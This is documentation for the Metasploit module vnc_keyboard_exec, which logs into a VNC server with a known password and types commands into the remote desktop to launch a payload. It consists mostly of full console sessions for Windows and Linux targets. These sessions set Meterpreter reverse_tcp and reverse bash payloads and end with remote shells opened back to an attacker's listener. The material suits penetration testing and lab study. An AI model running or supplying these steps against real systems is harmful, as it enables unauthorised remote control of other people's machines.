This module connects to a VNC service and sends keystrokes to "type" and execute a payload.
(For extra fun, watch the commands getting typed in the Windows/Linux GUI :))
Windows
Steps to reproduce (Tested on Windows 7 Pro SP1 64-bit):
Download TightVNC (http://www.tightvnc.com/download.php) or RealVNC (https://www.realvnc.com/download/)
Install and set a password
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.131
RHOST => 192.168.2.131
msf exploit(vnc_keyboard_exec) > set target 0
target => 0
msf exploit(vnc_keyboard_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[*] Started reverse handler on 192.168.2.130:4444
[*] 192.168.2.131:5900 - Trying to authenticate against VNC server
[*] 192.168.2.131:5900 - Authenticated
[*] 192.168.2.131:5900 - Opening Run command
[*] 192.168.2.131:5900 - Typing and executing payload
[*] Sending stage (884782 bytes) to 192.168.2.131
[*] Meterpreter session 77 opened (192.168.2.130:4444 -> 192.168.2.131:49243) at 2015-07-10 13:32:49 +0700
meterpreter >
Linux
Steps to reproduce (tested on Kali Linux):
apt-get install tightvncserver
tightvncpasswd
tightvncserver
Check which port tightvnc is started on; on my machine this was 5901 (5900+1 because of the new X11 session on :1)
msf > use exploit/multi/vnc/vnc_keyboard_exec
msf exploit(vnc_keyboard_exec) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(vnc_keyboard_exec) > set target 2
target => 2
msf exploit(vnc_keyboard_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(vnc_keyboard_exec) > set RPORT 5901
RPORT => 5901
msf exploit(vnc_keyboard_exec) > set PASSWORD pwned
PASSWORD => pwned
msf exploit(vnc_keyboard_exec) > exploit
[*] Started reverse handler on 192.168.2.130:4444
[*] 192.168.2.130:5901 - Trying to authenticate against VNC server
[*] 192.168.2.130:5901 - Authenticated
[*] 192.168.2.130:5901 - Opening "Run Application"
[*] 192.168.2.130:5901 - Opening xterm
[*] 192.168.2.130:5901 - Typing and executing payload
[*] Command shell session 76 opened (192.168.2.130:4444 -> 192.168.2.130:34240) at 2015-07-10 13:30:33 +0700